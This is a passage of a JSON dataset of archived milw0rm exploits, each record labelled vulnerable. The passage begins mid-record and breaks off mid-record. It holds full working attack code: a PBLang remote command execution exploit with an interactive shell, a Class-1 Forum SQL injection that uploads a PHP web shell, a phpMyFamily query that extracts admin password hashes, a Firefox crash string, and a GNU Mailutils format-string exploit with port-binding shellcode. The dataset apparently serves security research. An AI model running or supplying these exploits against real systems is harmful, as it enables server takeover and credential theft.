folder[8]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[9]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[10]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[11]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[12]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[13]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[14]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[15]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nsleep(2);\n\nprint \"[+] DONE\\n\\n\";\n\nprint $remote \"$chop\\n\";  \n\nprint \"W00t.FTP Flawned!\\n\";\n\nprint \"..press any key to exit\\n\";\n\n$bla= ;\n\nclose $remote;\n\n\n\n# milw0rm.com [2005-09-07]",
1060        "vulnerable": true
1061    },
1062    {
1063        "exploit_id": 1202,
1064        "content": "<?php\n\n#\n\n|    ##############################################    |\n\n|    # PBLang <= 4.65 remote commands exec exploit#    |\n\n|    # tested on 4.65                             #    |\n\n|    # (c)oded by Pengo 2005 RST/GHC              #    |\n\n|    # http://rst.void.ru                         #    |\n\n|    # http://ghc.ru                              #    |\n\n|    ##############################################    |\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n# WARNING! This exploit is successfully work when magic_quotes_rpc off =(\n\n# D:\\httpd\\php>php.exe ..\\www\\r57pblang465.php localhost /pbl/ \"pblcookie732128=Pe\n\n# ng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;\" Peng0 PrSrS\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n$ARGV = $_SERVER['argv'];\n\nglobal $ARGV;\n\nif(count($ARGV) == 0)\n\n{\n\n echo base64_decode(\"3fLu8iDx6vDo7/Ig5O7r5uXtIOH78vwg5+Dv8/nl7SDo5yDq7uzg7eTt7u\n\nkg8fLw7uroLiDR7eD34OvgIO3z5u3uIOfg8OXj6PHy8Ojw7uLg8vzx/yDoDQroIOfg6+7j6O3o8vzx/\n\nyDt4CD25evl4u7sIPTu8PPs5Swg5+Dy5ewg7fPm7e4g7+7x7O7y8PLl8vwg6vPq6DogcGJsY29va2llI\n\nFBCTHNlY2lkLg0KxfHr6CDi6uv+9+Xt+yBtYWdpY19xdW90ZXNfcnBjIPHq8Ojv8iDt5SD08+3q9uju7\n\nejw8+XyLg==\");\n\n exit;\n\n}\n\n\n\nif (count($ARGV) < 5)\n\n{\n\n echo '############################################################\n\n     PBLang <=4.65 remote command execution exploit\n\n        by RST/GHC // rst.void.ru / ghc.ru //\n\n############################################################\n\n usage:\n\n r57pblang465.php [URL] [DIR] [COOKIE] [LOGIN] [PASS] [PROXI:PORT]\n\n params:\n\n  [URL] - server url e.g. www.host.ru\n\n  [DIR] - directory where PBLang installed e.g. /forum/ or /\n\n  [COOKIE] - e.g. \"pblcookie732128=Peng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;\"\n\n  [NAME] - your account name\n\n  [PASS] - your account pass\n\n  [PROXI:PORT] - e.g. \"130.208.18.30:3128\" (optional)\n\n############################################################';\n\n exit;\n\n}\n\n\n\n$serv   = $ARGV[1];\n\n$dir    = $ARGV[2];\n\n$cookie = $ARGV[3];\n\n$login  = $ARGV[4];\n\n$pass   = $ARGV[5];\n\n\n\nif(isset($ARGV[6]))\n\n{\n\n $ARGV[6] = parse_url($ARGV[6]);\n\n $host = $ARGV[6]['host'];\n\n $port = $ARGV[6]['port'];\n\n} else {\n\n $host = $serv;\n\n $port = '80';\n\n}\n\n\n\nfunction create_socket($hostname,$portt,$post)\n\n{\n\n $socket = @fsockopen($hostname, $portt, $errno, $errstr, 60)\n\n            or die (\"\\n[-] CONNECT FAILED\\r\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\");\n\n $answer = '';\n\n fwrite($socket,$post);\n\n while (!feof($socket))\n\n {\n\n  $answer .= fgets($socket, 128);\n\n }\n\n fclose($socket);\n\n return $answer;\n\n}\n\n\n\n$a = 1;\n\n\n\nprint \"\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\";\n\nprint \"\\nexample 'close'\\n\";\n\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n\n\n$din = fopen('php://stdin','r');\n\n\n\nwhile ($a !== 0)\n\n{\n\n print \"shell>\"; $cmd = fgets($din, 100);\n\n if(!stristr($cmd,'close'))\n\n {\n\n  echo $cmd.\"\\n\";\n\n\n\n  $query = \"user=\";\n\n  $query .= $login;\n\n  $query .= \"&pass=\";\n\n  $query .= $pass;\n\n  $query .= \"&pass2=\";\n\n  $query .= $pass;\n\n  $query .= \"&oldpass=\";\n\n  $query .= $pass;\n\n  $query .= \"&em=cool@hacker.ru&emhide=hide\";\n\n  $query .= \"&realname=&alias=\".$login.\"&msn=&icq=&aim=&yahoo=&qq=&web=http%3A%2F%2F\";\n\n  $query .= \"&loc=%22%3B+system%28%22echo%20%5F%45%4E%54%45%52%5F%3B%20\";\n\n  $query .= $cmd;\n\n  $query .= \"%3B%20%5F%51%55%49%54%5F%22%29%3B+echo+%22\";\n\n  $query .= \"&pt=rst.ghc%21&av=none&webav=&sig=&regcode=1125428486&lang=en&accept=1&Submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC\";\n\n\n\n  $post = \"POST http://\".$serv.$dir.\"ucp.php?id=2&user=\".$login.\" HTTP/1.0\\r\\nHost: \".$serv.\"\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nUser-Agent: Mozilla/4.0\\r\\nCookie: \".$cookie.\"\\r\\nContent-Length: \".strlen($query).\"\\r\\n\\r\\n$query\";\n\n\n\n  $answer = create_socket($host,$port,$post);\n\n/*\n\n  $fp = fopen('lol.htm','w');\n\n  fwrite($fp,$answer);\n\n  fclose($fp);\n\n*/\n\n  if (eregi(\"_ENTER_(.*)_QUIT_\" , $answer, $cut))\n\n  {\n\n   $a = 1;\n\n   echo $cut[1];\n\n   echo \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\";\n\n  } else {\n\n    echo \"\\r\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n    echo \"[-] EXPLOIT FAILD\\r\\n\";\n\n    echo \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\";\n\n   $a = 0;\n\n  }\n\n } else {\n\n  echo \"\\r\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n  echo \"[-] EXPLOIT CLOSED\\r\\n\";\n\n  echo \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\";\n\n  $a = 0;\n\n  fclose($din);\n\n }\n\n}\n\n\n\n?>\n\n\n\n# milw0rm.com [2005-09-07]",
1065        "vulnerable": true
1066    },
1067    {
1068        "exploit_id": 1204,
1069        "content": "<!--\n\n\n\nMozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String\n\nFormatted for your tesing /str0ke\n\n\n\nTom Ferris\n\nwww.security-protocols.com\n\n\n\nVersions Affected:\n\nFirefox Win32 1.0.6 and prior\n\nFirefox Linux 1.0.6 and prior\n\nFirefox 1.5 Beta 1 (Deer Park Alpha 2)\n\n\n\nTechnical Details:\n\nThe problem seems to be when a hostname which has all dashes causes the\n\nNormalizeIDN call in nsStandardURL::BuildNormalizedSpec to return true,\n\nbut is sets encHost to an empty string.  Meaning, Firefox appends 0 to\n\napproxLen and then appends the long string of dashes to the buffer\n\ninstead.  The following HTML code below will reproduce this issue:\n\n\n\nString:\n\n<A HREF=https:--------------------------------------------- >\n\n\n\n-->\n\n\n\n<A HREF=https:\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad >\n\n\n\n# milw0rm.com [2005-09-09]",
1070        "vulnerable": true
1071    },
1072    {
1073        "exploit_id": 1207,
1074        "content": "<?php\n\n\n\n# 6.44 08/09/2005\n\n#\n\n# Class-1 Forum sql injection / remote code execution poc exploit\n\n#\n\n# coded by rgod -> http://rgod.altervista.org\n\n#\n\n# make these changes in php.ini if you have troubles\n\n# with this script:\n\n#\n\n# allow_call_time_pass_reference = on\n\n# register_globals = on\n\n#\n\n# this is my piece of poetry...\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho '<head><title>class1 remote commands execution</title>\n\n      <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\n\n      <style type=\"text/css\">\n\n      <!--\n\n      body,td,th {color: #00FF00;}\n\n      body {background-color: #000000;}\n\n      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }\n\n      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\n\n\t       font-weight: bold;\n\n\t       font-style: italic;\n\n              }\n\n      -->\n\n      </style></head>\n\n      <body>\n\n      <p class=\"Stile6\">Class-1 Forum (possibly prior versions) remote commands execution</p>\n\n      <p class=\"Stile6\">a script by rgod at <a href=\"http://rgod.altervista.org\" target=\"_blank\">http://rgod.altervista.org</a></p>\n\n      <table width=\"84%\" >\n\n      <tr>\n\n      <td width=\"43%\">\n\n      <form name=\"form1\" method=\"post\" action=\"'.$SERVER[PHP_SELF].'?path=value&host=value&port=value&command=value&proxy=value\">\n\n      <p>\n\n       <input type=\"text\" name=\"host\">\n\n      <span class=\"Stile5\">hostname (ex: www.sitename.com) </span></p>\n\n      <p>\n\n        <input type=\"text\" name=\"path\">\n\n        <span class=\"Stile5\">path (ex: /class1/ or /forum/ or just /) </span></p>\n\n      <p>\n\n      <input type=\"text\" name=\"port\">\n\n      <span class=\"Stile5\">specify a port other than 80 (default value) </span></p>\n\n      <p>\n\n      <input type=\"text\" name=\"command\">\n\n        <span class=\"Stile5\">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>\n\n      <p>\n\n      <input type=\"text\" name=\"proxy\">\n\n        <span class=\"Stile5\">send exploit through an HTTP proxy (ip:port)  </span></p>\n\n      <p>\n\n          <input type=\"submit\" name=\"Submit\" value=\"go!\">\n\n      </p>\n\n    </form></td>\n\n    </tr>\n\n   </table>\n\n</body>\n\n</html>';\n\n\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".htmlentities($headeri[$li+$ki]).\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".htmlentities($headeri[$li]).\"</td>\";\n\n\t\t\t    }\n\n\n\necho \"</tr></table>\";\n\n}\n\n\n\n\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\n\n\nif (($path<>'') and ($host<>'') and ($command<>''))\n\n{\n\nif ($port=='') {$port=80;}\n\n\n\n\n\n#STEP 1 -> REGISTER\n\n$anumber=rand();\n\n\n\n$data=\"username=jimihendrix\".$anumber.\"&email=jimihendrix\".$anumber.\"@mail.com&password=jimyjimy&password2=jimyjimy&icq=&aim=&msn=&yahoo=&website=http%3A%2F%2F&location=&occupation=&interests=&signature=&notify_private=on&post_count_per_page=10&thread_count_per_page=20&msg_count_per_page=20&date_syntax=D%2C+d+M+Y%2C+G%3Ai%3As\";\n\n\n\nif ($proxy=='')\n\n       {\n\n        $packet=\"POST \".$path.\"users.php?mode=postuser HTTP/1.1\\r\\n\";\n\n\n\n       }\n\nelse\n\n       {\n\n        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);\n\n        if ($c==0) {\n\n                    echo 'check the proxy...<br>';\n\n\t            die;\n\n\t           }\n\n         else\n\n        {\n\n        $packet=\"POST http://\".$host.$path.\"users.php?mode=postuser HTTP/1.1\\r\\n\";\n\n\n\n        }\n\n\t}\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"users.php?mode=register\\r\\n\";\n\n$packet.=\"Accept-Language: en\\r\\n\";\n\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n\n$packet.=\"Cookie: PHPSESSID=0c13584ef61f6c93ff80253670db5fd7\\r\\n\\r\\n\";\n\n$packet.=$data;\n\n\n\nshow($packet);\n\n\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\n\n\n#STEP 2 -> LOGIN\n\n$data=\"username=jimihendrix\".$anumber.\"&password=jimyjimy\";\n\nif ($proxy=='')\n\n       {\n\n        $packet=\"POST \".$path.\"login.php HTTP/1.1\\r\\n\";\n\n\n\n       }\n\nelse\n\n       {\n\n\n\n        $packet=\"POST http://\".$host.$path.\"login.php HTTP/1.1\\r\\n\";\n\n\n\n       }\n\n\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"users.php?mode=login\\r\\n\";\n\n$packet.=\"Accept-Language: ru\\r\\n\";\n\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n\n$packet.=\"Cookie: PHPSESSID=0c13584ef61f6c93ff80253670db5fd7\\r\\n\\r\\n\";\n\n$packet.=$data;\n\n\n\nshow($packet);\n\n\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\n\n\n\n\n#STEP 3 -> UPLOAD A FILE / SQL INJECTION\n\n\n\n$data='-----------------------------7d51143b10418\n\nContent-Disposition: form-data; name=\"filename\"; filename=\"shell.php.'.\"' or 'a' ='a\".'\"\n\nContent-Type: text/plain\n\n\n\n<?php error_reporting(0); system($HTTP_GET_VARS[command]); ?>\n\n-----------------------------7d51143b10418\n\nContent-Disposition: form-data; name=\"description\"\n\n\n\n\n\n-----------------------------7d51143b10418\n\nContent-Disposition: form-data; name=\"subject\"\n\n\n\n\n\n-----------------------------7d51143b10418\n\nContent-Disposition: form-data; name=\"message\"\n\n\n\n\n\n-----------------------------7d51143b10418\n\nContent-Disposition: form-data; name=\"inc_sig\"\n\n\n\n\n\n-----------------------------7d51143b10418--';\n\n\n\nif ($proxy=='')\n\n       {\n\n        $packet=\"POST \".$path.\"viewforum.php?mode=newmessage&reply=1&id=1&forumid=1 HTTP/1.1\\r\\n\";\n\n\n\n       }\n\nelse\n\n       {\n\n\n\n       $packet=\"POST http://\".$host.$path.\"viewforum.php?mode=newmessage&reply=1&id=1&forumid=1 HTTP/1.1\\r\\n\";\n\n\n\n       }\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"viewforum.php?mode=newmessage&reply=1&id=1&forumid=1\\r\\n\";\n\n$packet.=\"Accept-Language: fr\\r\\n\";\n\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d51143b10418\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Mediapartners-Google/2.1\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n\n$packet.=\"Cookie: PHPSESSID=0c13584ef61f6c93ff80253670db5fd7\\r\\n\\r\\n\";\n\n$packet.=$data;\n\n\n\nshow($packet);\n\n\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\n\n\n\n\n\n\n#STEP 4 -> retrieving upload directory name\n\n\n\nif ($proxy=='')\n\n       {\n\n        $packet=\"GET \".$path.\"viewattach.php HTTP/1.1\\r\\n\";\n\n       }\n\nelse\n\n       {\n\n       $packet=\"GET http://\".$host.$path.\"viewattach.php HTTP/1.1\\r\\n\";\n\n       }\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"viewforum.php?mode=newmessage&reply=1&id=1&forumid=1\\r\\n\";\n\n$packet.=\"Accept-Language: fr\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n\n$packet.=\"Cookie: PHPSESSID=0c13584ef61f6c93ff80253670db5fd7\\r\\n\\r\\n\";\n\n\n\nshow($packet);\n\n\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\n\n\n$location=explode('location: ',$data);\n\n$temp=$location[1];\n\n$temp2=explode('/',$temp);\n\n$location=$temp2[0].'/';\n\n\n\nif ($location=='') {\n\n\t\t   echo 'Some problem to retrieve upload directory...<br>';\n\n\t\t   echo 'check this url manually... -> <a href=\"http://'.$host.':'.$port.$path.'viewattach.php\" target=\"_blank\">http://'.$host.':'.$port.$path.'viewattach.php</a><br>';\n\n\t\t   echo 'you will be redirected to upload dir...<br>';\n\n\t\t   echo 'then append this filename: '.\"shell.php.' or 'a' ='a\".' and type commands <br>';\n\n\t\t   echo 'appending again ?command=[your command] <br>';\n\n\t\t   die;\n\n\t\t  }\n\n\n\necho 'Found ... checking this location -> '.htmlentities($location);\n\n\n\n\n\n#STEP 5 -> Launching commands...\n\n\n\nif ($proxy=='')\n\n       {\n\n        $packet=\"GET \".$path.$location.\"shell.php.'%20or%20'a'%20='a?command=\".urlencode($command).\" HTTP/1.1\\r\\n\";\n\n       }\n\nelse\n\n       {\n\n       $packet=\"GET http://\".$host.$path.$location.\"shell.php.'%20or%20'a'%20='a?command=\".urlencode($command).\" HTTP/1.1\\r\\n\";\n\n       }\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"viewforum.php?mode=newmessage&reply=1&id=1&forumid=1\\r\\n\";\n\n$packet.=\"Accept-Language: fr\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n\n$packet.=\"Cookie: PHPSESSID=0c13584ef61f6c93ff80253670db5fd7\\r\\n\\r\\n\";\n\n\n\nshow($packet);\n\n\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while (!feof($fp))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho 'If Class-1 Forum is unpatched and vulnerable, now you will see '.htmlentities($command).' output...';\n\necho nl2br(htmlentities($data));\n\n\n\n}\n\n\n\n\n\n?>\n\n\n\n# milw0rm.com [2005-09-09]",
1075        "vulnerable": true
1076    },
1077    {
1078        "exploit_id": 1208,
1079        "content": "#!/usr/bin/perl -w\n\n# phpMyFamily Exploit injection\n\n# ==============================\n\n$banner = \"phpMyFamily Exploit injection \\n\\n==============================\n\n\\n\\nINFGPG-Hacking&Security Research\";\n\n# \n\n# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)\n\n# Info: 98.to/infamous\n\n\n\nuse IO::Socket;\n\nif ($#ARGV<0){\n\nprint \"\\n$banner\";\n\nprint \"\\n\\n Usage: perl phpMyFamily.pl [host] [path] \\n\\n\";\n\nexit;}\n\n\n\n$gen=\"%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL\n\nL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH\n\nERE%20admin='Y'%20LIMIT%201,1\"; # This selects first admin with login &\n\npassword hash :)\n\n\n\n$serius=\"GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\\r\\n\\r\\n\";\n\n$muka=IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$ARGV[0]\",PeerPort=>\"80\")\n\nor die \"$ARGV[0]Connection Failed !!\\n\\n\";\n\n\n\n$muka -> autoflush(1);\n\nprint $muka \"$serius\";   \n\nprint \"[*]Sending exploit DONE \\n\\n\";            \n\nsleep(7);\n\nclose($muka);\n\n\n\n# milw0rm.com [2005-03-27]",
1080        "vulnerable": true
1081    },
1082    {
1083        "exploit_id": 1209,
1084        "content": "/*\n\n *  GNU Mailutils 0.6 imap4d 'search' format string exploit.\n\n *  Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities\n\n *\n\n *  This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).\n\n *\n\n *  $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT\n\n *  [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.\n\n *  [+] By clem1.\n\n *  [+] connecting to: 127.0.0.1:143\n\n *  [+] authentification: completed.\n\n *  [+] format string: sended\n\n *  [+] shellcode sended.\n\n *  [+] Bingo.\n\n *  \n\n *  id;      \n\n *  uid=1000(clem1) gid=1002(mail) groups=0(root)\n\n *\n\n *  Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.\n\n */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <errno.h>\n\n#include <string.h>\n\n#include <getopt.h>\n\n#include <netdb.h>\n\n#include <sys/types.h>\n\n#include <sys/fcntl.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n#include <arpa/inet.h>\n\n\n\nstruct values {\n\n\tint offset;\n\n\tint IO_file_close;\n\n\tint addr;\n\n\tchar mailbox[32];\n\n} v = {\n\n\t11,\n\n\t0x40468bc4,\n\n\t0x80906e0, //0xaabbccdd\n\n\t\"inbox\"\n\n};\n\n\n\nvoid usage(char *);\n\nvoid auth(int, char *, char *);\n\nvoid sendsc(int);\n\nvoid owned(int, char *);\n\nvoid fmtbuild(int);\n\n\n\n/*\n\n * s0t4ipv6@Shellcode.com.ar\n\n * x86 portbind a shell in port 5074\n\n */\n\nchar sc[] = \"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\"\n\n\t    \"\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\"\n\n\t    \"\\xd2\\x52\\x66\\x68\\x13\\xd2\\x43\\x66\"\n\n\t    \"\\x53\\x89\\xe1\\x6a\\x10\\x51\\x50\\x89\"\n\n\t    \"\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\\x44\"\n\n\t    \"\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\"\n\n\t    \"\\x83\\xc4\\x0c\\x52\\x52\\x43\\xb0\\x66\"\n\n\t    \"\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\"\n\n\t    \"\\x80\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\"\n\n\t    \"\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\"\n\n\t    